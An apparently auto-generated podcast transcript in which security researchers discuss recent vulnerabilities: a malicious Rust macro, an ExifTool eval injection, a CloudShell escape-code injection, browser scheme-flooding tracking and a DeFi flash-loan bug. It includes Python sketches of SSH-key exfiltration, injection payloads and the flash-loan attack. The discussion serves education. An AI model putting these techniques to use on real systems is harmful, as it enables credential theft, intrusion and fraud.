Cross-Browser Tracking, Frag Attacks, and Malicious Rust Macros
This transcript is automatically generated; there will be mistakes.
Hello everyone. Welcome to another episode of the Day Zero podcast. I'm Specter; with me is zi, and this episode we have some research on using deep learning to discover vulnerabilities, cross-browser tracking, the fragmentation-based network attacks that were published last week, and some unsafe Rust code that hacks you, in Soviet Russia. Before we get into the topics though, a quick reminder: we are going on break for the summer after next week. So next week, May 24th, will be our last podcast episode until September 6th. That doesn't mean that Day Zero will go completely dark and that we won't have any content; it's just that the podcast will be on break, but we might still have, like, discussion videos and streams and stuff like that happening. Speaking of discussion videos, we will also have a few discussion videos coming out this week, talking about making the transition from CTF into real-world vulnerability research and exploitation. It's a three-part miniseries; those will be releasing Thursday, Friday, and Saturday this week, all back-to-back, so keep looking for those if that sounds interesting to you. And with that said, we'll get into some of our topics this week. So our first one is a white paper which talks about using natural language processing for doing static analysis and finding vulnerabilities, which, I know, we were thinking was kind of interesting, zi, because natural language processing, as I understand it, is usually used for, like, assistive technology; I haven't really seen it used in the context of, like, programming, just operating on code before.
It's usually used, of course, with natural, you know, human languages; it's not so much used with programming languages, which made this one stand out a little bit. I wish, as a paper, they would have gone a little bit deeper on that, but it was still interesting. You see this recent attempt to apply the natural language kind of training, and all the research that's gone into that, there has been a ton of research in that area, and just trying to apply it to code and seeing if it works. And ultimately, it looks like, you know, they've had some success with that. I have some questions when it comes to, like, the whole methodology of the research, but ultimately, in terms of how they set up their study and structured it, they were achieving, you know, up in, like, the 93% accuracy range in terms of classifying CWEs from a particular code snippet or file, saying yes, it has this vulnerability, or no, it's not vulnerable, which is a lot higher than I would have expected. Like I said, it's normally used with more of the natural language stuff, and, yeah, I guess assistive technologies like you said, but there are other places it could be used; text generation would be another common one.
Yeah. So we have seen some research papers before that have talked about doing deep learning for vulnerability discovery. I think what this one brings new to the table is the use of the transformer modules, as they call them. Now, AI and deep learning isn't really my field, but I believe what that does is it basically transforms the input code into a representation that can be used by BERT, or Bidirectional Encoder Representations from Transformers, which they use to classify vulnerabilities, and then they detect them using NIST's SARD, or the Software Assurance Reference Dataset, which has, like, a mapping of CWEs to some example code that contains those vulnerabilities. And I think they said the advantage of using the models that they do is that they're easier to train and they're also more accurate. So yeah, I believe that's kind of what's new to the table with the paper. I did find that accuracy pretty interesting, in the 90% range.
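The classification framing discussed here (code snippet in, vulnerable or not-vulnerable label out, trained on SARD-style good/bad pairs) can be sketched with a toy stand-in. This is emphatically not the paper's BERT pipeline, just a bag-of-tokens nearest-class model over invented snippet pairs, to show the shape of the task:

```python
import re
from collections import Counter

# Toy stand-in for the paper's BERT-based classifier: a bag-of-tokens
# nearest-class model. The training snippets and labels below are
# invented examples in the spirit of SARD's small good/bad pairs.
TRAIN = [
    ("strcpy(dst, src);", "vulnerable"),              # unbounded copy
    ("gets(buf);", "vulnerable"),
    ("strncpy(dst, src, sizeof dst - 1);", "safe"),
    ("fgets(buf, sizeof buf, stdin);", "safe"),
]

def tokens(code):
    """Crude lexer: split C code into identifier and symbol tokens."""
    return Counter(re.findall(r"[A-Za-z_]\w*|\S", code))

def classify(snippet):
    """Label a snippet by token overlap with each class's training pool."""
    counts = {"vulnerable": Counter(), "safe": Counter()}
    for code, label in TRAIN:
        counts[label] += tokens(code)
    snip = tokens(snippet)
    def score(label):
        return sum(min(snip[t], counts[label][t]) for t in snip)
    return max(counts, key=score)

print(classify("strcpy(out, user_input);"))   # overlaps the strcpy sample
```

As zi notes above, a model like this (or a far stronger one) can look deceptively accurate on tiny paired samples while telling you little about real-world code.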
Yeah. So what they don't make exactly clear is what the data they were actually testing against looked like versus the training data, or if they were still using that SARD data set, just pulled off the SARD data set. And this is kind of one of the problems that I somewhat see with this, especially if they did that. So, a common way is, you have your training data, and you take a few samples out of it that are going to be used for the actual testing. So it's not being trained on the exact ones it gets tested on, but it's still the same data set, and, I don't know, they make the argument it's more accurate this way. But if you take a look at a lot of the samples, I'm just going to pull a random C one up here, you'll notice they're very small pieces of code. It's not representative of actual software in any sense, especially the ones that end up having, like, the good and bad versions; it's often just, like, a removed line of code or something like that. Like, the code is very similar, just obviously fixing the bug, really, which, I mean, makes sense for the database, or the data set, but when it comes to training on it, it does feel like it might be over-trained on this particular type of data, and I would have been more interested in seeing how it applied to real-world source code, like if it could actually discover vulnerabilities that were previously unknown. Yeah, I mean that'd
definitely be the next step. I can kind of see why you would want to do this type of testing, at least for starting out, just to see, okay, is this promising, is it worth pursuing? But yeah, doing it this way, with these limited code samples, it's not going to be able to really... I have doubts that it will work too well on a monolithic code base which has a lot of complexity, especially with, like, C++, where you have so many different ways you can have indirection. And so I would be interested, that's another thing too, I don't think they really touch on it in the paper, I could be wrong, maybe I missed it, but it would be interesting to see how well it works in comparison between C and C++. They kind of focus on C and C++ as a collective for the premise of the paper, but I can see something like this being far more effective on a C code base, like, let's say, a kernel, as opposed to a C++ code base, like a game engine or a browser or something. So that would be kind of interesting to look at too. So I don't know if maybe those are in, like, the next steps for what they want to do. But yeah, I mean, I think it looks promising as a paper, but I just don't think it's in a really practical state yet. And, I mean, that's what a lot of the papers are that we
cover. So, to be fair, like, it is research, and like I said, they did kind of set out to look at that: can we even attempt to apply the natural language stuff to this? And I think they've had success with that; those are promising results, I'll say that much. I do feel like, though, they could have at least just tried to run it on real code, or maybe they did and just had, like, terrible results and didn't include it. It just feels like, you know, they've trained it on this; they should just be able to say, like, yeah, it also worked, or it also didn't work, although, I guess, that would be putting it in a bad light; perhaps they wouldn't include that. But, I mean, it seems like it wouldn't even take much extra work to set it up that way. Although that does mean that the code isn't self-contained, and a lot of what they're going to be finding here kind of requires that everything be in the same file. So that could also just be the place where it's somewhat limited. But, I mean, like I said, it's research; there's definitely some promise here, in terms of the results at least, from this evaluation of
them. Yeah, so it'll be interesting to see if that research ends up bearing any fruit in the near future. All right. So with that said, we'll move into some of our exploits. Our first exploit is kind of a fun one: it's Rust hacking you, instead of, you know, you hacking Rust. It's basically stealing files from a victim's home directory using Rust macros, turning the Rust-is-secure meme on its head a little bit. It exploits the VS Code editor to make this make_answer macro that they wrote get expanded, which will call the read_ssh_key function, which will find the user's private SSH key, if they have one, and send it over a socket. In the case of the PoC, they make it send to a local address, but it could be sent to a remote address too. So when the editor runs the preprocessing for that macro, that SSH key gets exfiltrated, and it demonstrates that an attacker can make something malicious happen just by opening the project in VS Code.
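A rough sketch of what the PoC macro effectively does at expansion time. The real PoC is a Rust proc macro; this Python stand-in uses an invented fake key file and a socketpair as the transport, so nothing real is read or sent:

```python
import os
import socket
import tempfile

# Python sketch of what the PoC's proc macro effectively does when the
# editor expands it: read a private key and push it out over a socket.
# A socketpair stands in for the attacker's listener so the demo is
# self-contained; the key file here is fake.

def exfiltrate(path, sock):
    """Read a file (e.g. ~/.ssh/id_rsa) and send its bytes over a socket."""
    with open(path, "rb") as f:
        sock.sendall(f.read())

# Fake "SSH key" so nothing real leaves the machine.
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\nexample\n")
    key_path = f.name

attacker, victim = socket.socketpair()    # stand-in for a TCP connection
exfiltrate(key_path, victim)
victim.close()
stolen = attacker.recv(4096)
print(stolen.decode().splitlines()[0])
os.unlink(key_path)
```

The point the hosts make next is that this code running at compile time is expected; the surprise is that it also runs during the editor's analysis pass.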
Yeah. So that's kind of where the issue comes in. It's not so much the editor that has the issue; like, it's not VS Code with the issue, it's the rust-analyzer tool that has the issue, and rust-analyzer is the language server implementation. So you run a language server, the editor connects to the language server and just kind of sends files, sends what you're typing, or whatever, sends queries over to it, and it'll analyze your code base to determine, you know, what's a token, or what something refers to; all of that is done by the language server. That way the editor can learn about new languages without needing to manually implement, like, every new language; the language designers can create their language server. So the issue here is the fact that these procedural macros are meant to be executed at compile time. So if you were compiling this, that code would be executed; that's fine, it's a security risk, but you kind of understand that. It's the fact that it will also execute them during that analysis phase, when you're just looking at the code; that's where I think you could argue maybe it shouldn't do that, or it should be documented that it will do that, something like that. But in this case, because of the fact that it does execute them while doing the analysis pass, just to figure out what things refer to, that's where it's able to execute the code from just opening it within VS Code, or within any editor that uses that
language server. Yeah, so like I said, here they're exfiltrating an SSH key; in theory you can basically do anything, though, with this kind of attack. You could exfiltrate other files, or just, like, pop a shell or whatever. So yeah, the PoC is fairly innocuous, but it could be used to do some serious damage. I mean, we have seen cases where malicious projects have been used to try to attack people, with the North Korean state actors; they were sending malicious Visual Studio projects. I forget exactly what they were abusing, but they were abusing a feature of Visual Studio to pop a shell, or get code execution on a victim machine, when they opened the malicious VS project. So, I mean, this may seem a little bit silly, but it could absolutely be used in a practical attack; we've seen it before. And because it affects the language server, it could potentially affect other editors as well, not just VS Code. I don't think they really touched on that too much; I think they, like, mentioned it in passing, but they haven't really tried it on other editors. But yeah, I mean, it's scary what can happen out there with language
servers. It's an interesting attack surface. I am wondering, though, why they chose to exfil the file rather than, you know, doing the demo popping a shell, and I'm not sure if there are limitations on the type of code that can be executed within the procedural macros. That might be why they only tried to exfil a file rather than popping a shell. So there might be limitations there; I was looking into it, and I couldn't find anything that actually indicated that. The only thing that seemed to be the case is that it has to actually return, like, a token stream. But it is something I'm at least wondering about, because it does seem like an interesting choice to not pop a shell, which kind of implies everything
else. Yeah, popping a shell is way more fun. I did just want to address something from chat quickly; people are asking about Teamstar. So yeah, I know Teamstar hasn't been on in a while; it's just because I've been busy and haven't been able to do the PS4 streams, so he hasn't been on the podcast. We thought about maybe bringing him on at some point, but yeah, hopefully Teamstar will be on again soon. It's just, you know, it's been a little while; it's been a bit crazy for me. So that's why, I didn't want people to think that, you know, Teamstar just went and abandoned us or something; that's not what happened. So, all right, with that said, we can move on to GitLab. So GitLab is in this week's episode through a HackerOne report from vakzz. The issue is code injection through lack of validation of image files, provided from GitLab Workhorse, that get passed to ExifTool, which is used to remove tags that aren't explicitly marked as allowed. Now, this seems to be more of an issue in ExifTool than an issue in GitLab, but I could kind of see how you could maybe put a bit of the blame on both; mostly, though, I think it's an ExifTool problem. GitLab does pay out for vulnerabilities even if it's not within their own code; they pay 50%, although they are actually looking to change that. That was raised in the comments on this one, actually, that they pay out 50% of what they normally would, but they're looking to change that. So that's why it's getting reported to GitLab: because they do still pay out, like, an advertised 50%, even if it's not their
code. Yeah, so the major problem with ExifTool is, when it takes files, it doesn't properly check; it doesn't really factor in the file extension. It'll try to automatically determine what it is based on the file contents. So if you pass a malicious file with, like, a PNG extension, even though it's a PNG extension, if you make it look like a DjVu, and that's a weird one for me to pronounce for some reason, we'll say DjVu file, it will get parsed as DjVu, not as a PNG image. And that file type is kind of special, because it has some very interesting features from an attack-surface perspective. One of the things it can do is it can convert C escape sequences, but the... well, I don't think that's necessarily too interesting of a feature, the fact that they support the C escapes; it's more the fact that, since they're in Perl, they do it using kind of the easy way: they take the token that's been parsed, and in order to resolve the C escape sequences, they run it through eval in Perl, which is obviously a dangerous function if it can be used this way. And they do a check here to try and make sure things are being escaped, so you can't just inject a quote. But, I mean, I don't know; the fact that C escape sequences are supported isn't that interesting of a feature. It's not something that just stands out as, okay, that's going to be vulnerable, to me; it's just kind of benign that it supports it. I mean, a lot of applications support doing those sorts of escape
characters. Yeah. So the problem is, because you can break out of that escape handling, you can inject arbitrary Perl, with which you basically get code execution, and that can let you get a remote shell. This kind of reminds me of, do you remember those really old Visual Basic tutorial-style projects, where they show you how to write a calculator and they're like, just pass it into eval, or whatever the equivalent was in VB? It's kind of like that; it's just exploiting a lazy usage, just not wanting to put in the work to do it properly and safely, just throwing it into eval
like throwing it into eval. I would rather do that than try and custom-implement it. Like, I get it's an anti-pattern; if you don't want to actually be using eval, it's better if there's some other language feature for supporting just those minor conversions. Like, Python exposes the converter directly. That said, in this case, we should also mention how the escape happens, because of one issue: you'll notice the example metadata on screen here goes copyright, quote, backslash, and then a newline, and then quote. That kind of causes the issue, because it's looking for that quote to already be escaped; if that quote is escaped, then it will pass it through into eval. The problem is that the backslash is actually escaping the newline, not the quote, and it doesn't quite take that into account. So it thinks the quote's been escaped when it actually hasn't. That's how they can break out and use the dot to append, or concatenate, another string, and that's where they do their actual execution. So I just wanted to call out where the issue actually happens, like, what it's not checking; they'd just kind of mentioned you can escape without actually going to the details.
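The contrast just described, eval as the lazy unescape versus the converter the language exposes directly, can be sketched like this. The injected token is an invented example, not the actual DjVu payload, and Python's eval stands in for Perl's:

```python
import codecs

# The dangerous shortcut: unescape C escape sequences by wrapping the
# token in quotes and eval-ing it (the pattern ExifTool used in Perl,
# sketched here with Python's eval).

tok = "line1\\nline2"                     # token containing a C escape

unescaped_evil = eval('"' + tok + '"')    # works, but it is an eval

# If an unescaped quote sneaks into the token, eval runs attacker code:
injected = '" + __import__("os").sep + "'
ran_code = eval('"' + injected + '"')     # evaluates os.sep: code ran

# The safe route: use the escape converter the language already exposes.
unescaped_safe = codecs.decode(tok, "unicode_escape")

print(repr(unescaped_evil))
print(repr(unescaped_safe))
print(repr(ran_code))
```

The same break-out shape, an unescaped quote followed by a concatenation operator, is what the DjVu payload achieves in Perl with the dot operator.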
Yeah, so after that they demonstrate that the issue is exploitable; the way they do that is they get a shell and they dump some command output, including a process listing. So yeah, like we said, the bug is more in ExifTool than anything, which I think they did independently patch, though they didn't credit the researcher who reported it to GitLab, nor did they request a CVE. And I wanted to kind of call out GitLab here, because they did something really cool: they filed for a CVE on behalf of the researcher, and they also paid a $20K bounty. So yeah, they didn't really have to go and get a CVE issued, but they wanted it to be known that there was a security issue that you should update for, and to get the researcher credited. So that was pretty cool of GitLab, I think. I just wanted to call that out quickly. But yeah, pretty interesting bug.
Yeah. Like, it's a simple bug, and like you said, using eval isn't the best idea, but it makes sense to try and use something that's already built to kind of do that. So using eval is definitely a common pattern; probably not something you should do, but it's also the type of thing you don't want to code yourself.
Yeah, I guess if you're ever going to have to use eval, or you feel like you want to use it, you just have to make sure that you absolutely, a hundred percent, trust the source going into it. You just have to be very vigilant whenever you're using it; it's like a big red flag. So, all right, next we have a Project Zero report that got disclosed last week, an AWS CloudShell issue that was fixed back in March. The issue is in the terminal emulator when it tries to handle DCS escape codes, in the term.js library. So when it encounters one of those codes, it will attempt to send the parameter that's attached to it into the terminal input handler. And because you can pass multi-line strings in for that parameter, you can abuse that to get command injection in the terminal. So the example they give is, if you curl a web page that has a malicious payload with that escape sequence in it, you can run a command that will create a file, for example, when the user gets the curl output in their terminal. So that's kind of what's important there: the fact that anything going into the terminal, not just input, is evaluated for those escape sequences and can be exploited. So as long as an attacker can get malicious output into your terminal, that's all they need to take over,
basically. Yeah, and I found it kind of interesting that this .send would ultimately lead into, like, the terminal's input, when it's kind of dealing with, you know, displaying the output. Although it also kind of makes sense, in the idea that your input or output is all kind of just coming through as a data stream that it's displaying however it's supposed to. So it kind of makes sense that it makes its way in there, like, I could see a path, but it wasn't intuitive to me that that would be the case. And in this case, almost all the other escape codes, you can scroll up through the code, they kind of handle that parameter that gets passed through before it's used in send; this one in particular just takes the parameter and reflects it right back at the output, which makes it vulnerable. I love the kind of attack surface, just being, like, curl a page or cat a file, and you're able to get code execution. Like, that is, I guess, a fairly fun way to attack
someone. It's not really one that I've seen in other issues, really, so it's kind of unique in that
respect. You'll see, when we talk about, like, curl issues sometimes, where if you curl the right page, you can compromise curl and get your code execution that way; like, attacking somebody using those sorts of applications is out there, and we have covered some cases of it. This one too, just the fact, I guess, also, that it's so simple; it is kind of the more traditional command injection, rather than, like, a full-out exploit or memory-corruption type
issue. Yeah, for sure. So, it's a cool issue. It's also a great entry point for an attacker to get into an AWS instance, because, well, it's a management console, so it's also fairly high impact if you do get hit with it. Though it does obviously require some interaction in order to exploit, so that is a bit of a mitigating factor. But yeah, I mean, overall, I think it's a cool bug,
and I'm not sure how soon this one is to actually get patched either. I guess they do say fixed, so that might be in the AWS deployment itself, but the term.js here, like, being used by Cloud9: the last commit was 2016, and this is the master branch; the whole repo has been archived. That said, I guess the most likely case is AWS is running a fork of it and not actually the old code.
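The reflection bug class the hosts describe can be sketched with a toy output parser. This is a simplified model, not term.js's actual DCS handling; the handler behavior and payload are illustrative:

```python
# Toy terminal-output parser sketching the bug class: a DCS sequence
# (ESC P ... ESC \) whose payload the emulator reflects back into the
# terminal's INPUT stream, as if the user had typed it.

ESC = "\x1b"
typed_into_shell = []          # stand-in for the terminal's input handler

def handle_output(stream):
    """Process program output; reflect DCS payloads as a status reply."""
    i = 0
    while i < len(stream):
        if stream.startswith(ESC + "P", i):           # DCS introducer
            end = stream.index(ESC + "\\", i)         # string terminator
            payload = stream[i + 2:end]
            # The flaw: the reply embeds the payload verbatim, and a
            # newline inside it is delivered to the shell as Enter.
            typed_into_shell.append(payload)
            i = end + 2
        else:
            i += 1                                    # ordinary character

# A curl of a malicious page prints this into the victim's terminal:
malicious_output = ESC + "P" + "touch /tmp/pwned\n" + ESC + "\\"
handle_output(malicious_output)
print(typed_into_shell)
```

This is why the multi-line parameter matters: without the embedded newline, the reflected text would just sit on the victim's prompt instead of executing.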
It is an interesting point to bring up, though, because anything else that is using term.js could be vulnerable to the same attack. So this would be a good thing to look at if you're looking at a target that, you know, uses term.js. So yeah, that's a good point to bring up. Yeah, it looks like it was fixed pretty quickly, and like you said, it must have just been fixed on the AWS side; it was fixed, at least given the timeline in the comments, within, like, four days. So, all right. So we'll get into our big fish topic of the week, which was cross-browser tracking. So this was a vulnerability disclosed by FingerprintJS, which affects multiple browsers, including Chrome, Safari, Firefox, and by extension Tor as well, and it can be used to identify you even if you have some sort of barrier in place, like a VPN, because it's creating an identifier using the browser itself. How it does that is it uses application URI schemes as a sort of side channel, to check if a user has a given application installed. So the example they give there is, like, the Skype URI handler: they'll try to see if they can launch Skype, and if they can't, it says, like, it doesn't exist, or whatever behavior the browser gives, because it varies browser to browser, with
like three of the four that they tested behaving similarly. I don't think they actually mention exactly what Chrome did, or how Chrome's works; they give some details, but I feel like it's missing, because they talk about the PDF thing with Chrome. Yeah, anyway. So for Firefox, Safari, and Tor Browser, which is built on Firefox, what would happen is, if you had a scheme the browser didn't understand, it would open up this error page, and that's an internal error page. So if you're the opener, you've opened this pop-up, it goes to, like, your Slack or whatever application, and it goes to that error page; you won't be able to access that page because of the same-origin policy. But if you try and open a handler or a custom scheme that does exist, it'll hit the about:blank page that shows you that little dialogue, you know, do you approve opening this application; it'll show you that dialogue on an about:blank page, which will be same-origin, so you can access it through, like, the opener. So that's how they could detect whether or not it popped up. Interestingly, because Tor Browser doesn't show you those prompts, it just disables them by default pretty much, the attack they use, rather than using a pop-up, they were able to just use an iframe to check, which made it a lot more silent, because it would just hide the page for the most part; you'd just have the little iframe in the way. So that was kind of interesting, the fact that Tor Browser ended up being easier to compromise, or quieter to compromise, I guess. Because that's kind of the big issue here, the fact that you're opening pop-ups, you're testing all of these URLs, every time; that's just going to be loud on any user. And, I guess, touching on Chrome: Chrome had a little bit of protection, where you have to have some sort of user interaction with the page before it could just open another.
So it's before it can actually do pop-ups in general, but in this case it also helps protect against opening the custom protocols. So to get around that, apparently all you have to do is trigger the PDF viewer, and that will basically disable the entire protection and treat it as though there was user interaction. Which, I mean, there's obviously a reason for why they did that.
It's just weird. Yeah. So any extension can reset that flag, and that's because they have to be able to open custom URLs as per the specification. So the reason they went for the PDF viewer was because it was built in, but in theory you could have hit, like, any extension, or abuse any extension that the user would have had installed. Yeah, good
point. I wasn't thinking that extensions could also register themselves as handlers for those
protocols. Yeah, so yeah, that's a solid point. Actually,
I don't think we mentioned, on Chrome, actually how they detected whether or not it opened. They only talk about this PDF trick that they use, and then they talk about that being how they could open it. And then for Firefox, Safari, Tor Browser, they don't actually mention how they're detecting it on Chrome. So I assume Chrome has the exact same thing, internal error page, about:blank for the prompt, but I'm not actually confident in that, and this write-up, I don't think, actually states that explicitly, or I'm just missing
it. Yeah, I do wish they were a little bit more clear and, like, methodical, I guess, when it came to the browsers, because they talked about the differences between them; that was, like, their main point of that section, saying, okay, what were the unique challenges, I guess, presented with each browser, which is cool, but it would have been nice to see a summary of the attack being used on each browser. But yeah, that's not really there. I did also want to call out Tor: while they were able to do the silent attack with the iframes, there was a little bit of a mitigating factor, in that Tor took a pretty long time to exploit the vulnerability. They don't really go into many details on why that's the case, but they said it could take up to, like, ten seconds per application that you wanted to check, which they do have kind of a workaround for, and that's by tricking the user into using a gesture to run the application test, like a click event or typing characters. So the example they give there is, like, a fake captcha. But yeah, Tor was a little bit strange, in how it was almost, like, rate-limited in how much you could do, because of how slow it was. But just by probing for applications on a user, you can kind of build this unique identifier, and they call this scheme flooding. As a bonus, they point out, from an attacker perspective, you could also use this to profile your targets by checking for certain applications. So if you check for applications that, like, regular users wouldn't have, like a PostgreSQL server, they can see if you're a developer, for example, or if they check for some kind of government software, they can check if you're a government employee. So it was kind of interesting in that respect too; you could use it in two ways. You could use it to build the unique identifier, but you could also use it to target your attacks. So I thought that was kind of a cool aspect.
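How the per-scheme probes combine into a stable identifier can be sketched briefly. The browser-side check itself (opening skype://, slack://, and so on, and watching the reaction) is simulated by a lookup table here, and the scheme list is illustrative:

```python
import hashlib

# Sketch of the scheme-flooding idea: each custom URL scheme probe
# yields one bit, and the bit vector hashes to a device identifier
# that is the same in any browser on the machine.
SCHEMES = ["skype", "slack", "spotify", "postgres", "zoomus", "vscode"]

def probe(scheme, installed_apps):
    """Stand-in for the browser-side check (popup/iframe behavior)."""
    return scheme in installed_apps

def device_id(installed_apps):
    bits = "".join("1" if probe(s, installed_apps) else "0" for s in SCHEMES)
    return bits, hashlib.sha256(bits.encode()).hexdigest()[:16]

bits, ident = device_id({"slack", "vscode", "postgres"})
print(bits, ident)
# Profiling angle from the episode: a postgres hit suggests a developer.
print("likely developer:", bits[SCHEMES.index("postgres")] == "1")
```

The same bit vector serves both uses discussed here: hashed, it is a tracking identifier; read bit by bit, it is a profile of the target.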
Yeah. The whole attack itself is just kind of a creative use of the schemes that get registered. I mean, I think it's an interesting attack. Like I said early on, it's kind of loud; it is opening a little pop-up there every time, I think; it'll definitely kind of trigger something, but then it just stops, and you don't really notice it. But the fact that it does take a little bit of time, even when you're not on Tor Browser; on any of them, it takes time to test every application. So because of that, I don't see this gaining widespread adoption, but it is still an interesting attack. Like, you can fingerprint a user based off of it, and it works regardless of what browser you're currently using, to fingerprint the specific
device. I love these kinds of browser side channels. We've talked about a few of them before; I forget the exact specifics, but I remember we talked about one that had to do with, like, abusing the canvas to profile the user's screen. I just love these kinds of browser side channels; they're just so creative to me, and it's fun to see how they can be abused. As of yet, only Chrome seems to be actively trying to address this issue, at least when they wrote this. There was nothing indicated by, like, Firefox, or Apple for Safari, stating that they were looking into how to address this or mitigate it, but I think they did say Chrome is actively working to fix it, and they might have already done so by now; I'm not sure, I hadn't looked into it too much. But yeah, I mean, cross-browser tracking is pretty
important. That's kind of how I read this, though: wasn't it that only Chrome seemed to already be aware of it, before they started reporting on it? Because Chrome's scheme flooding, like, acknowledgement of this goes back to June 2020. So it seemed like, you know, when they're talking about that, it's not so much that the other browsers won't be doing anything to protect against it, but that Chrome was already aware of it. I might have been mistaken about that, but that was at least my reading. It seems like, yeah, the bug on, like, Mozilla's side was only opened four days ago, whereas the Chrome one goes back, like I said, to
June. Sorry, I was just taking a quick look. They do have links at the bottom of the post to the reports that they made. So that's the one you were talking about, with June 2020 on Chrome, but it has had activity as of, like, four days ago.
Yeah, what I'm saying is, it sounds like Chrome was aware of this before. It's like, they didn't open the Chrome one; they opened the Safari and Firefox ones. I don't know, I guess Safari, like, doesn't work that way, but it's the Mozilla bug that was opened only four days ago; the Chrome bug, though, that was opened back in June. Oh, I see. So that's what I'm saying: when they're talking about it, it only seems like Chrome was aware of it, and it seems like that's because Chrome was doing something about this before FingerprintJS ever, you know, came up with this attack, or reported this attack, whereas Firefox is only acting on it now that they've been made aware of it. Yeah, so this kind of reflects
well on Chrome, and this has been the case, I think, with some of the other side channels we've looked at too. I don't know why, but it seems Chrome has always been a little bit ahead of the game when it comes to trying to mitigate these side channels. I guess that's just because Chrome is such a big player in the browser market, especially now, where it's being used by, like, Edge too. But, well,
there's that, and I mean the fact that Google is an advertising company. With Chrome, the more they can lock other people out from doing the fingerprinting, so that you have to rely on Google to do it, the better it is for them. So they do kind of have a vested interest, despite the fact that they do advertising and tracking themselves, in actually making it harder for others to do that same
thing. Yeah, it's a fair point. It's in their best interest. All right, so we have cryptocurrency appearing this week in the form of the Fei Protocol, used in decentralized finance, or DeFi. I want to state up front before we get into it: neither zi nor myself have experience with DeFi, and this bug is a logical issue in smart contracts. The write-up goes into a lot of terms that seem a bit alien if you're not into the financial area, like flash-loan-driven market manipulation and slippage tolerance. So it is going to be a bit of a tough one to cover, but yeah, this one pays out.
Yeah, it's crypto. It's definitely not an area I have a lot of background in. I have casually looked at the occasional dApp vulnerability, but it's not an area I really know too much about. I will say kind of the key background on this one, and what makes it, well, it doesn't make it interesting, but a side effect of it: the bounty reward was eight hundred thousand dollars, paid out in TRIBE, but still, $800,000. That is, as far as I'm aware, the biggest bounty
reported. That's got to be the biggest bounty payout. Yeah.
Like, for a single thing, that is a huge bounty. So anyway, the key concepts here: Specter just mentioned flash loans. The idea of a flash loan is a loan, not a small loan, a loan that happens really quickly. You can take out as much as you want up to the limits, but it must be paid back within the same transaction in which it gets borrowed. This is done using a DeFi smart contract. And for people saying no way on the $800,000: I mean, Specter, you did the calculation on it, didn't you? I think you had it in the notes, what an attacker could have gotten.
If this was attacked by somebody malicious, this could have resulted in a compromise of over 200 million dollars. So $800K in the grand scheme of things is really a drop in the bucket compared to what could have happened if this was exploited.
Yeah, so that would have been like 60,000 ETH, which is kind of what you could make with this. So, touching on flash loans: like I said, it happens within one of those smart contracts. You have to take the money out, spend it, do whatever, and return it all in one transaction. If that doesn't happen, the whole thing is rolled back and it's as if nothing ever happened. So flash loans are called that because they're very quick; it happens in a flash, in one transaction. They're kind of atomic, so there's no real risk for whoever put the money in of losing their funding, and they'll usually charge a little bit to make a profit off them. So where that comes in with the Fei Protocol, and I'm saying "fye", I'm not entirely sure if that's how it's said or if it's like "fee" or something, so we'll kind of leave that: it's a stablecoin, so it's pegged to some value to give it a controllable value. It's not going to fluctuate like Bitcoin. It will algorithmically try to control its own value, what's called protocol controlled value. And to do this, it has a pair on Uniswap, which is just a place where you can swap between different coins. You put a bunch of liquidity into a giant pool, and people can buy your coin whenever they want, or you can buy the coin back, and if the value of the coin goes too high, it will start selling off cheaper coins to drive the value back down. So what it does is it has this bonding curve contract, where it will sell off newly minted coins if the price goes above $1.01. It will just sell on that bonding curve, saying yeah, you can buy newly minted coins for $1.01 no matter what the market price is. And that bonding curve holds onto that money until somebody calls the allocate function on it. When the allocate function is called, it goes and checks the prevailing price on Uniswap, like hey, what's it going for here, and adds all that ETH back into the liquidity pool.
It does the usual thing there and sells it off at whatever the prevailing price is to get the FEI coins back. When it does that, it's also willing to accept like a hundred percent slippage, which is just the amount of price change that can happen between when you submit your transaction and when it actually executes. And one of the issues there is the fact that it does check the prevailing price and then puts it on the market at whatever that rate is. So something that Uniswap actually mentions is that you have to be careful to basically add tokens at the right price, and you shouldn't do this from a smart contract. So allocate does check to try to make sure it's not being called from a contract. However, there was a problem with that check: if you called it from a contract, but did it during the constructor of the contract, the check would pass. Frankly, I'm not exactly sure of the details there, but obviously the constructor happens at the start, and if you call allocate in the constructor, it's like calling allocate in the middle of the rest of the smart contract. So they were able to attack the price that it was going to sell at. So the whole attack here, putting everything together: you flash-borrow some ETH, use that ETH to purchase FEI on Uniswap, and that's going to drive up the market price, getting it to like $1.20 or whatever. Once it's pumped up, you can go to that bonding curve and buy a bunch of FEI at just $1.01. So now you have a bunch of FEI, and the bonding curve has a bunch of money, so you can trigger that allocate call, which adds that liquidity back into Uniswap, buying back FEI there at this elevated price. All the FEI you bought, especially the FEI at $1.01, you can now sell right back into the pool at this elevated price and profit off of it with all your new ETH.
Then you repay your flash loan and pocket all the money. So the calculations figured out that if you were to abuse basically every flash loan available, you'd be able to get away with about 60,000 ETH.
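The attack flow described above can be sketched as a toy simulation. To be clear, this is not the real contract logic: the pool sizes, the loan amount, and the "1 ETH equals $1" simplification are all invented assumptions purely to show why the economics work out in the attacker's favor.

```python
# Toy model of the pump / buy-cheap / allocate / dump flow. All numbers
# are illustrative; only the mechanism mirrors the write-up.

class ConstantProductPool:
    """Minimal Uniswap-v2-style x*y=k pool (no trading fee)."""

    def __init__(self, eth: float, fei: float):
        self.eth, self.fei = eth, fei

    def price(self) -> float:
        """Spot price of FEI, in ETH per FEI (1 ETH = $1 in this toy)."""
        return self.eth / self.fei

    def buy_fei(self, eth_in: float) -> float:
        """Swap eth_in for FEI, preserving x*y = k."""
        k = self.eth * self.fei
        self.eth += eth_in
        fei_out = self.fei - k / self.eth
        self.fei -= fei_out
        return fei_out

    def sell_fei(self, fei_in: float) -> float:
        """Swap fei_in for ETH, preserving x*y = k."""
        k = self.eth * self.fei
        self.fei += fei_in
        eth_out = self.eth - k / self.fei
        self.eth -= eth_out
        return eth_out


pool = ConstantProductPool(eth=10_000, fei=10_000)  # starts at 1.00 per FEI
CURVE_PRICE = 1.01                                   # bonding curve mints here
loan = 6_000                                         # flash-borrowed ETH

# 1. Pump: dump most of the loan into the pool to inflate the FEI price.
fei_pumped = pool.buy_fei(5_000)
assert pool.price() > CURVE_PRICE    # market price now well above the curve

# 2. Buy cheap: the bonding curve still mints FEI at the fixed $1.01.
fei_cheap = 1_000 / CURVE_PRICE

# 3. allocate(): the curve's ETH goes back into the pool, buying FEI at
#    the manipulated price (the 100% slippage tolerance lets this happen).
pool.buy_fei(1_000)

# 4. Dump: sell every FEI we hold into the inflated pool.
eth_back = pool.sell_fei(fei_pumped + fei_cheap)

# 5. Repay the flash loan within the same "transaction"; keep the rest.
profit = eth_back - loan
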